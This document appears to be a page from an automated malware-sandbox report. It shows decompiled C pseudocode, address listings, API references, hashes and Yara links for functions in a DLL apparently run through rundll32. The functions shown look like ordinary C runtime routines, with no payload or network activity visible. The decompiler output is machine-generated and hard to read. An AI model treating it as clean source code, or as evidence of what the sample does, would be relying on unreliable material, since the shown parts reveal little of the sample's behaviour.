															_v648 = _t250 >> 2;
															do {
																_v640 = _t227;
																_v636 = _t227;
																_v632 = _t227;
																_v628 = _t227;
																_v624 = _t227;
																_v620 = _t227;
																_t185 = E6F3215AB( &(_v608.cFileName),  &_v640,  &_v609, E6F321B96(_t279, __eflags));
																_t316 = _t316 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t289);
																	_push(_t188);
																	L33();
																	_t316 = _t316 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t227;
																		if(_v620 != _t227) {
																			E6F31FEFF(_v632);
																			_t188 = _v652;
																		}
																		_t227 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t256 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t256;
																	if(_t256 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t256 - 0x2e;
																		if(_t256 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t227;
																			if( *((intOrPtr*)(_t188 + 2)) == _t227) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t303);
																goto L77;
																L68:
																__eflags = _v620 - _t227;
																if(_v620 != _t227) {
																	E6F31FEFF(_v632);
																}
																__eflags = FindNextFileW(_t303,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t258 = _v648;
															_t280 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t258 - _t199;
															if(_t258 != _t199) {
																E6F31EB90(_t227, _t289, _t303, _t280 + _t258 * 4, _t199 - _t258, 4, E6F3214E1);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t227);
															_push(_t227);
															_push(_t289);
															L33();
															_t227 = _t179;
														}
														L77:
														__eflags = _v656;
														if(_v656 != 0) {
															E6F31FEFF(_v668);
														}
													} else {
														__eflags = _t245 - _t289 + 1;
														if(_t245 == _t289 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t279);
															_push(0);
															_push(0);
															_push(_t289);
															L33();
														}
													}
													__eflags = _v16 ^ _t310;
													return E6F31C65E(_v16 ^ _t310);
												} else {
													goto L40;
												}
											}
										} else {
											_t210 = 0xc;
											L37:
											return _t210;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t213 = _v12;
									_t264 = _v16;
									 *((intOrPtr*)(_v32 + _t213)) = _t264;
									_t140 = _t213 + 4;
									_t234 = _t264 + _v20;
									_v16 = _t234;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t299 = _t298 | 0xffffffff;
							_v12 = _t299;
							L25:
							E6F31FEFF(_t223);
							_pop(_t235);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t223;
							_t218 = E6F324A50(_t132,  &_v8);
							_t235 =  *_t294;
							__eflags = _t218;
							if(_t218 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t218);
								_push(_t235);
								L46();
								_t312 = _t312 + 0xc;
								_v12 = _t218;
								_t299 = _t218;
							} else {
								_t219 =  &(_v608.cAlternateFileName);
								_push(_t219);
								_push(_t223);
								_push(_t223);
								_push(_t235);
								L33();
								_t299 = _t219;
								_t312 = _t312 + 0x10;
								_v12 = _t299;
							}
							__eflags = _t299;
							if(_t299 != 0) {
								break;
							}
							_t294 =  &(_a4[1]);
							_a4 = _t294;
							_t132 =  *_t294;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t285 = _v608.cAlternateFileName;
								_t233 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t285 = _v608.cAlternateFileName;
						L26:
						_t273 = _t285;
						_v32 = _t273;
						__eflags = _v40 - _t273;
						asm("sbb ecx, ecx");
						_t237 =  !_t235 & _v40 - _t273 + 0x00000003 >> 0x00000002;
						__eflags = _t237;
						_v28 = _t237;
						if(_t237 != 0) {
							_t301 = _t237;
							do {
								E6F31FEFF( *_t285);
								_t223 = _t223 + 1;
								_t285 = _t285 + 4;
								__eflags = _t223 - _t301;
							} while (_t223 != _t301);
							_t285 = _v608.cAlternateFileName;
							_t299 = _v12;
						}
						E6F31FEFF(_t285);
						goto L31;
					}
				} else {
					_t220 = E6F3201A4(_t320);
					_t299 = 0x16;
					 *_t220 = _t299;
					E6F3200E7();
					L31:
					return _t299;
				}
				L81:
			}

0x6f32169e
0x6f3216a1
0x6f3216a5
0x6f3216a7
0x6f3216bd
0x6f3216c1
0x6f3216c4
0x6f3216c6
0x6f3216c8
0x6f3216ca
0x6f3216cc
0x6f3216cf
0x6f3216d2
0x6f3216d5
0x6f3216d7
0x6f32173a
0x6f32173c
0x6f32173f
0x6f321741
0x6f321745
0x6f32174e
0x6f32174f
0x6f321752
0x6f321754
0x6f321757
0x6f32175b
0x6f32175b
0x6f32175d
0x6f32175f
0x6f321761
0x6f321763
0x6f321763
0x6f321765
0x6f321768
0x6f32176b
0x6f32176b
0x6f32176d
0x6f32176e
0x6f32176e
0x6f321779
0x6f32177b
0x6f32177e
0x6f32177f
0x6f321782
0x6f321782
0x6f321786
0x6f321789
0x6f32178c
0x6f32178c
0x6f32178c
0x6f321799
0x6f32179b
0x6f32179e
0x6f3217a0
0x6f3217b8
0x6f3217bb
0x6f3217be
0x6f3217c0
0x6f3217c3
0x6f3217c5
0x6f3217c8
0x6f3217cb
0x6f321828
0x6f32182b
0x6f32182e
0x6f321830
0x00000000
0x6f3217cd
0x6f3217cf
0x6f3217cf
0x6f3217d1
0x6f3217d4
0x6f3217d4
0x6f3217d6
0x6f3217d8
0x6f3217de
0x6f3217e1
0x6f3217e1
0x6f3217e3
0x6f3217e4
0x6f3217e4
0x6f3217eb
0x6f3217ee
0x6f3217f2
0x6f3217ff
0x6f321804
0x6f321807
0x6f321809
0x6f32187f
0x6f321880
0x6f321881
0x6f321882
0x6f321883
0x6f321884
0x6f321889
0x6f32188d
0x6f32188f
0x6f321890
0x6f321893
0x6f321893
0x6f321896
0x6f321896
0x6f321898
0x6f321899
0x6f321899
0x6f32189d
0x6f32189e
0x6f3218a5
0x6f3218a8
0x6f3218ab
0x6f3218ad
0x6f3218b7
0x6f3218b8
0x6f3218b9
0x6f3218bc
0x6f3218c6
0x6f3218ca
0x6f3218cc
0x6f3218e0
0x6f3218e0
0x6f3218e3
0x6f3218ed
0x6f3218f2
0x6f3218f5
0x6f3218f7
0x00000000
0x6f3218f9
0x6f3218f9
0x6f3218fe
0x6f321905
0x6f321908
0x6f32190a
0x6f32191b
0x6f32191d
0x6f32191f
0x6f32191f
0x6f32191f
0x6f32190c
0x6f32190d
0x6f321912
0x6f321915
0x6f321924
0x6f32192a
0x00000000
0x6f32192d
0x6f3218ce
0x6f3218ce
0x6f3218d4
0x6f3218d9
0x6f3218dc
0x6f3218de
0x6f321930
0x6f321932
0x6f321933
0x6f321934
0x6f321935
0x6f321936
0x6f321937
0x6f32193c
0x6f32193f
0x6f321940
0x6f321942
0x6f321948
0x6f32194f
0x6f321952
0x6f321955
0x6f321958
0x6f321959
0x6f32195a
0x6f32195d
0x6f321963
0x6f321965
0x6f321967
0x6f321967
0x6f321969
0x6f32196b
0x00000000
0x00000000
0x6f32196d
0x6f32196f
0x6f321971
0x6f321973
0x6f32197e
0x6f321980
0x6f321982
0x00000000
0x00000000
0x6f321982
0x6f321973
0x00000000
0x6f32196f
0x6f321984
0x6f321984
0x6f32198a
0x6f32198c
0x6f321992
0x6f321994
0x6f3219b6
0x6f3219b6
0x6f3219b8
0x6f3219ba
0x6f3219c6
0x6f3219c6
0x6f3219bc
0x6f3219bc
0x6f3219be
0x00000000
0x6f3219c0
0x6f3219c0
0x6f3219c2
0x6f3219c4
0x00000000
0x00000000
0x6f3219c4
0x6f3219be
0x6f3219ce
0x6f3219d6
0x6f3219dc
0x6f3219dd
0x6f3219df
0x6f3219e7
0x6f3219ed
0x6f3219f3
0x6f3219f9
0x6f321a0d
0x6f321a12
0x6f321a1d
0x6f321a2d
0x6f321a33
0x6f321a35
0x6f321a38
0x6f321a5b
0x6f321a5b
0x6f321a60
0x6f321a66
0x6f321a66
0x6f321a6c
0x6f321a72
0x6f321a78
0x6f321a7e
0x6f321a84
0x6f321aa5
0x6f321aaa
0x6f321aaf
0x6f321ab3
0x6f321ab9
0x6f321abc
0x6f321acf
0x6f321acf
0x6f321ad5
0x6f321adb
0x6f321adc
0x6f321add
0x6f321ae2
0x6f321ae5
0x6f321aeb
0x6f321aed
0x6f321b4b
0x6f321b51
0x6f321b59
0x6f321b5e
0x6f321b64
0x6f321b65
0x00000000
0x00000000
0x00000000
0x6f321abe
0x6f321abe
0x6f321ac1
0x6f321ac3
0x00000000
0x6f321ac5
0x6f321ac5
0x6f321ac8
0x00000000
0x6f321aca
0x6f321aca
0x6f321acd
0x00000000
0x00000000
0x00000000
0x00000000
0x6f321acd
0x6f321ac8
0x6f321ac3
0x6f321b67
0x6f321b68
0x00000000
0x6f321aef
0x6f321aef
0x6f321af5
0x6f321afd
0x6f321b02
0x6f321b11
0x6f321b11
0x6f321b19
0x6f321b1f
0x6f321b25
0x6f321b2c
0x6f321b2f
0x6f321b31
0x6f321b41
0x6f321b46
0x00000000
0x6f321a3a
0x6f321a3a
0x6f321a40
0x6f321a41
0x6f321a42
0x6f321a43
0x6f321a4b
0x6f321a4b
0x6f321b6e
0x6f321b6e
0x6f321b76
0x6f321b7e
0x6f321b83
0x6f321996
0x6f321999
0x6f32199b
0x6f3219b0
0x00000000
0x6f32199d
0x6f32199d
0x6f3219a0
0x6f3219a1
0x6f3219a2
0x6f3219a3
0x6f3219a8
0x6f32199b
0x6f321b8a
0x6f321b95
0x00000000
0x00000000
0x00000000
0x6f3218de
0x6f3218af
0x6f3218b1
0x6f3218b2
0x6f3218b6
0x6f3218b6
0x00000000
0x00000000
0x00000000
0x00000000
0x6f32180b
0x6f32180b
0x6f321811
0x6f321814
0x6f321817
0x6f32181a
0x6f32181d
0x6f321820
0x6f321823
0x6f321823
0x00000000
0x6f3217d4
0x6f3217a2
0x6f3217a2
0x6f3217a5
0x6f321832
0x6f321833
0x6f321838
0x00000000
0x6f321838
0x6f3216d9
0x6f3216d9
0x6f3216dc
0x6f3216e4
0x6f3216e7
0x6f3216ee
0x6f3216f0
0x6f3216f2
0x6f32170d
0x6f32170e
0x6f32170f
0x6f321710
0x6f321715
0x6f321718
0x6f32171b
0x6f3216f4
0x6f3216f4
0x6f3216f7
0x6f3216f8
0x6f3216f9
0x6f3216fa
0x6f3216fb
0x6f321700
0x6f321702
0x6f321705
0x6f321705
0x6f32171d
0x6f32171f
0x00000000
0x00000000
0x6f321728
0x6f32172b
0x6f32172e
0x6f321730
0x6f321732
0x00000000
0x6f321734
0x6f321734
0x6f321737
0x00000000
0x6f321737
0x00000000
0x6f321732
0x6f3217ad
0x6f321839
0x6f32183c
0x6f321840
0x6f321849
0x6f32184c
0x6f321850
0x6f321850
0x6f321852
0x6f321855
0x6f321857
0x6f321859
0x6f32185b
0x6f321860
0x6f321861
0x6f321865
0x6f321865
0x6f321869
0x6f32186c
0x6f32186c
0x6f321870
0x00000000
0x6f321877
0x6f3216a9
0x6f3216a9
0x6f3216b0
0x6f3216b1
0x6f3216b3
0x6f321878
0x6f32187e
0x6f32187e
0x00000000

APIs

_free.LIBCMT ref: 6F321833

Strings

*?, xrefs: 6F3216DC

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 8c8d511e6ea196100512c12a7ea46039141ace5b87392d3855a92573c06a66c9
Instruction ID: feb6599c535dc25b78aa85e9af78e3c997bc08b8ba3d87a36c36ba0911bd7046
Opcode Fuzzy Hash: 8c8d511e6ea196100512c12a7ea46039141ace5b87392d3855a92573c06a66c9
Instruction Fuzzy Hash: 15613CB5E042199FDB14DFA9C9805EEFBF5EF88314B24816AD854F7340D772AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 6F31F52B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E6F31F52B(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				void* _t59;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						_push(_t59);
						E6F3223D2(_t48, _t59);
						E6F321E1F(_t57, 0, 0x6f35e218, 0x104);
						_t26 =  *0x6f35e7c0; // 0xeb3470
						 *0x6f35e7b0 = 0x6f35e218;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x6f35e218;
							_v20 = 0x6f35e218;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E6F31F7DC(E6F31F663( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E6F31F663( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E6F321D12(_t48, 0, _t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x6f35e7b4 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x6f35e7b8 = _t58;
											L18:
											E6F31FEFF(_t37);
											_v12 = 0;
											L19:
											E6F31FEFF(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x6f35e7b4 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x6f35e7b8 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E6F3201A4(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E6F3201A4(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E6F3200E7();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x6f31f52b
0x6f31f534
0x6f31f539
0x6f31f543
0x6f31f546
0x6f31f563
0x6f31f563
0x6f31f564
0x6f31f577
0x6f31f57c
0x6f31f584
0x6f31f58a
0x6f31f58d
0x6f31f58f
0x6f31f596
0x6f31f596
0x6f31f598
0x6f31f59b
0x6f31f59e
0x6f31f5a5
0x6f31f5be
0x6f31f5c3
0x6f31f5c5
0x6f31f5e6
0x6f31f5ee
0x6f31f5f1
0x6f31f60c
0x6f31f60f
0x6f31f616
0x6f31f61a
0x6f31f61c
0x6f31f623
0x6f31f626
0x6f31f628
0x6f31f62a
0x6f31f62c
0x6f31f636
0x6f31f636
0x6f31f638
0x6f31f63e
0x6f31f641
0x6f31f643
0x6f31f649
0x6f31f64a
0x6f31f650
0x6f31f653
0x6f31f654
0x6f31f65a
0x6f31f65d
0x00000000
0x00000000
0x00000000
0x00000000
0x6f31f62e
0x6f31f62e
0x6f31f62e
0x6f31f631
0x6f31f632
0x6f31f632
0x00000000
0x6f31f62e
0x6f31f61e
0x00000000
0x6f31f61e
0x6f31f5f6
0x6f31f5f6
0x6f31f5f7
0x6f31f5fc
0x6f31f5fe
0x6f31f600
0x6f31f605
0x6f31f605
0x00000000
0x6f31f605
0x6f31f5c7
0x6f31f5cc
0x6f31f5ce
0x6f31f5cf
0x00000000
0x6f31f5cf
0x6f31f591
0x6f31f594
0x00000000
0x00000000
0x00000000
0x6f31f594
0x6f31f548
0x6f31f54b
0x00000000
0x00000000
0x6f31f54d
0x6f31f554
0x6f31f555
0x6f31f557
0x6f31f55c
0x00000000
0x6f31f55c
0x00000000

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6F31F56E, 6F31F575, 6F31F5AB
p4, xrefs: 6F31F57C

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe$p4
API String ID: 0-1443154838
Opcode ID: 6a4e2d8002f07d26c737e46efd193a9d4a4862ad7a54d0df88a6d6311d234b99
Instruction ID: 016c5de264f9ecc6a8892e459074fb59797a3b6950bdaa884188b5def79f80d1
Opcode Fuzzy Hash: 6a4e2d8002f07d26c737e46efd193a9d4a4862ad7a54d0df88a6d6311d234b99
Instruction Fuzzy Hash: C34172B1A08714AFDB19DFA9CC80D9EBBFCEF85714F10016AE544A7290E7719A51C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6F324C89, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F324C89(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E6F323D99(_t33) != 0xffffffff) {
					_t13 =  *0x6f35e428; // 0xed0940
					if(_t33 != 1 || ( *(_t13 + 0x98) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x60) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E6F323D99(2);
						if(E6F323D99(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E6F323D99(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E6F323D08(_t33);
						 *((char*)( *((intOrPtr*)(0x6f35e428 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x38)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E6F32016E(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}

0x6f324c90
0x6f324c9d
0x6f324ca3
0x6f324cab
0x6f324cb9
0x00000000
0x00000000
0x00000000
0x00000000
0x6f324cc1
0x6f324cc1
0x6f324cc3
0x6f324cd5
0x00000000
0x00000000
0x6f324cd7
0x6f324ce7
0x00000000
0x00000000
0x6f324cef
0x6f324cf1
0x6f324cf2
0x6f324d0a
0x6f324d11
0x00000000
0x6f324d1f
0x00000000
0x6f324d1a
0x6f324cab
0x6f324c9f
0x6f324c9f
0x00000000

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,6F324BBF,?,6F3452B8,0000000C,6F324C67,?,?,?), ref: 6F324CDF
GetLastError.KERNEL32(?,6F324BBF,?,6F3452B8,0000000C,6F324C67,?,?,?), ref: 6F324CE9
__dosmaperr.LIBCMT ref: 6F324D14

Strings

@, xrefs: 6F324CA3

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: @
API String ID: 2583163307-2548697605
Opcode ID: 46a026dce26c12a4aecb5fd1511e7414d9450a69247640452ce27cbba7ab6998
Instruction ID: 8e3ee86a6547639876c520342f85a8d87777a2539729efc05019a892e43dfc1f
Opcode Fuzzy Hash: 46a026dce26c12a4aecb5fd1511e7414d9450a69247640452ce27cbba7ab6998
Instruction Fuzzy Hash: 3F01C4766087303AD215527CD949B6D37EDAF86B38F25025FE9588B1C3DF72E4808260

Uniqueness

Uniqueness Score: -1.00%

Function 6F3215AB, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F3215AB(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E6F3227A9(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E6F3227A9(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E6F32016E(GetLastError());
									_t19 =  *((intOrPtr*)(E6F3201A4(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E6F321BF1(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6F32016E(GetLastError());
						return  *((intOrPtr*)(E6F3201A4(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E6F321BF1(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E6F321BD7(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x6f3215b2
0x6f3215b7
0x6f3215d5
0x6f3215d7
0x6f3215da
0x6f321607
0x6f32160f
0x6f321611
0x6f32162a
0x6f32162d
0x6f321630
0x6f32163e
0x6f32164d
0x6f321655
0x6f321657
0x6f321670
0x6f321673
0x6f321673
0x6f321659
0x6f321660
0x6f32166b
0x6f32166b
0x6f321675
0x00000000
0x6f321675
0x6f321635
0x6f32163a
0x6f32163c
0x00000000
0x00000000
0x00000000
0x6f32163c
0x6f32161a
0x00000000
0x6f321625
0x6f3215dc
0x6f3215df
0x6f3215e2
0x6f3215f5
0x6f3215f8
0x6f3215cb
0x6f3215cb
0x00000000
0x6f3215ce
0x6f3215e8
0x6f3215ed
0x6f3215ef
0x6f321679
0x6f321679
0x00000000
0x6f3215ef
0x6f3215b9
0x6f3215be
0x6f3215c3
0x6f3215c5
0x6f3215c8
0x00000000

APIs

Part of subcall function 6F321BD7: _free.LIBCMT ref: 6F321BE5

Part of subcall function 6F3227A9: WideCharToMultiByte.KERNEL32(?,00000000,6F32084A,00000000,00000001,6F3207E3,6F323ABD,?,6F32084A,?,00000000,?,6F323834,0000FDE9,00000000,?), ref: 6F32284B

GetLastError.KERNEL32 ref: 6F321613
__dosmaperr.LIBCMT ref: 6F32161A
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6F321659
__dosmaperr.LIBCMT ref: 6F321660

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: d1b0333cc93ed61ff9a4aec9ef519b8bb90d8aa66451446e1fcbf29af63e7d4f
Instruction ID: 296ac4ac41a773112aa41b67ba9317228fe7709ba90e0baad02b44750927f56a
Opcode Fuzzy Hash: d1b0333cc93ed61ff9a4aec9ef519b8bb90d8aa66451446e1fcbf29af63e7d4f
Instruction Fuzzy Hash: A9219D72608205AFAB10AF658E8091FB7ECFF453787148618FC6597290EB32EC518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F32103A, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6F32103A(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6f34619c; // 0x6
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6F3204CA(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6F3201B7(_t43, 1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6F3204CA(__eflags,  *0x6f34619c, _t51);
							if(__eflags != 0) {
								E6F320E38(_t60, _t51, 0x6f35e640);
								E6F31FEFF(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6F3204CA(__eflags,  *0x6f34619c, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6F3204CA(0,  *0x6f34619c, 0);
							_push(0);
							L9:
							E6F31FEFF();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6F32048B(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6f34619c; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6F31FE28(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x6f34619c; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6F3204CA(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6F3201B7(_t43, 1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6F3204CA(__eflags,  *0x6f34619c, _t60);
								if(__eflags != 0) {
									E6F320E38(_t60, _t60, 0x6f35e640);
									E6F31FEFF(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6F3204CA(__eflags,  *0x6f34619c, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6F3204CA(__eflags,  *0x6f34619c, _t20);
								_push(_t60);
								L25:
								E6F31FEFF();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6F32048B(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
